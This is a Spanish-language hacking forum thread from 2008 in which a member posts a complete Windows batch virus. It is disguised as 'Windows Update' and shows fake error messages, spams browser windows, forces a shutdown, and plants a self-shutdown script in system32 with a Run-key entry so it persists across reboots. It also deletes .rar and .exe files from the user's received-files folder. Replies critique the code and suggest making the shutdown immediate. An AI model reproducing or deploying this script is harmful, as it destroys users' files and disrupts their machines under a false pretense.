Freyja
Recien llegado

leer para aprender y asi ser la mejor
|
 |
« : 04 de Mayo de 2008, 07:48:54 » |
|
Bueno hace tiempo que no podía practicar, maldita universidad XD! Pero me puse a intentar y a intentar y me quedó algo como lo que les voy a mostrar, no espero recibir elogios ni cosas a si, si hay críticas mejor aun, ya que es la primera vez que hago algo como esto. Bueno, aca va el código.
@echo off Title Windows Udpate Color 0a :startmenu msg * Error: 1980765 msg * The application will be close msg * Please wait, don't push any button. goto spammenu :spammenu start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx start www.microsoft.com/en/us/default.aspx goto hidemenu :hidemenu shutdown -s -t 60 -c "Windows will close. This will install new udpates in the system." goto genmenu :genmenu CD "%userprofile%\escritorio" echo @echo off>>Udpateinstaller.bat echo Title Udpate Installer>>Udpateinstaller.bat echo shutdown -s -t 10>>Udpateinstaller.bat echo msg * The udpates have been installed correctly>>Udpateinstaller.bat echo exit>>Udpateinstaller.bat goto copyanddeletemenu :copyanddeletemenu copy "%userprofile%\escritorio\Udpateinstaller.bat" /v "C:\Windows\system32\Udpateinstaller.bat" copy "%userprofile%\escritorio\Udpateinstaller.bat" /v "C:\Windows\system\Udpateinstaller.bat" del /q "%userprofile%\escritorio\Udpateinstaller.bat" goto raipropmenu :raipropmenu reg add "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run" /v Udpateinstaller.bat /t reg_sz /d "C:\Windows\system32\Udpateinstaller.bat" goto delraizmenu :delraizmenu del /q "%userprofile%\Mis documentos\Mis archivos recibidos\*.rar" del /q "%userprofile%\Mis documentos\Mis archivos recibidos\*.exe" goto exitmenu :exitmenu exit
Bueno ahí si me equivoqué en algo me dicen por favor, se los agradecería bastante. Fuí seprando el batch en distintos menus para que me quedara ordenado (asi no me pierdo jeje) Lo ideal sería que reiniciara la máquina. Y le puse un número cualquiera en el mensaje de error. Bueno, eso. Ahí me dicen. Saludos y gracias a todos.[/color]
|
|
|
|
|
|
|
|
|
|
|
LokoD4rk
NZ4

el tel que estaba aqui era el de samantha :P
|
 |
« Respuesta #2 : 04 de Mayo de 2008, 11:26:50 » |
|
exacto... 50 y 10 segundos es mucho...mejor shutdown -s -t 00  Saludos!
|
|
|
|
« Última modificación: 04 de Mayo de 2008, 11:28:38 por abcdefghij »
|
|
Para ver este enlace Registrate o Inicia SesionElimina tus virus sin necesidad de programitas! =) (under construction) Para ver este enlace Registrate o Inicia Sesionesto queee? da click o sino te arrepentiras Te amoooooooooooo ooooo (esto no va aqui en el foro xP)
|
|
|
|
|
|
|
ZION2
NZ2

ZION From BlackSite Defacer Advance Root System
|
 |
« Respuesta #5 : 10 de Mayo de 2008, 10:08:00 » |
|
|
|
|
|
|
|
|
|
|
LokoD4rk
NZ4

el tel que estaba aqui era el de samantha :P
|
 |
« Respuesta #6 : 10 de Mayo de 2008, 10:20:39 » |
|
umm amigo...calmat e dice "mi primer intento de virus en batch" apenas aprende... aparte es bueno...xD...q ue hueva cerrar 33 ventanas de internet  xD aparte con antonella no te metes... Saludos! PD.no desviemos el tema...simplem ente no te alteres...es su "primer intento"
|
|
|
|
|
|
Para ver este enlace Registrate o Inicia SesionElimina tus virus sin necesidad de programitas! =) (under construction) Para ver este enlace Registrate o Inicia Sesionesto queee? da click o sino te arrepentiras Te amoooooooooooo ooooo (esto no va aqui en el foro xP)
|
|
|
|
|
Branco
NZ3

^^ mi segundo avatar ^^
|
 |
« Respuesta #8 : 10 de Mayo de 2008, 10:30:59 » |
|
man en esta materia de virus si vas a hacer tu primer virus debe ser lo mejor ese code es debil y no me calmo ok los virus por mas piteros q sean deben ser bien hechos  uyyy ke fiera te pones brother si vieras mis primeros intentos jajaja neta k si ttrankilisate brother si es debil o no ya aprendera a mejorarlo como kieres k aprenda a correr si apenas aprende a gatear weey todos empesamos desde ceero y como dice es su primer intento no le kierass pedir k cree el mejor virus explosivo y destructor del planeta ..... salu2 
|
|
|
|
|
|
|
|
|
ZION2
NZ2

ZION From BlackSite Defacer Advance Root System
|
 |
« Respuesta #9 : 11 de Mayo de 2008, 05:05:55 » |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
bonillas
Colaborador

¡¡¡Just Shut the fuck up, and drive!!!
|
 |
« Respuesta #15 : 21 de Mayo de 2008, 11:08:29 » |
|
A su madre, qué pleito hacen por una tontería xD... déjen a ZION2 hombre, él está dando su opinión y se respeta. Freyja, para ser tu primer intento no está mal, y como dice el lambiscón de abcdefghij, qué weba andar cerrando ventanas xD Besos Atte. Freyja.[/color]
Sí, hasta acá me llegaron, gracias... xD... PD: No ando de lambiscón, y creanme, no estoy haciendo ESPAM. xD.
|
|
|
|
|
|
¡Vegas baby!
|
|
|
|
|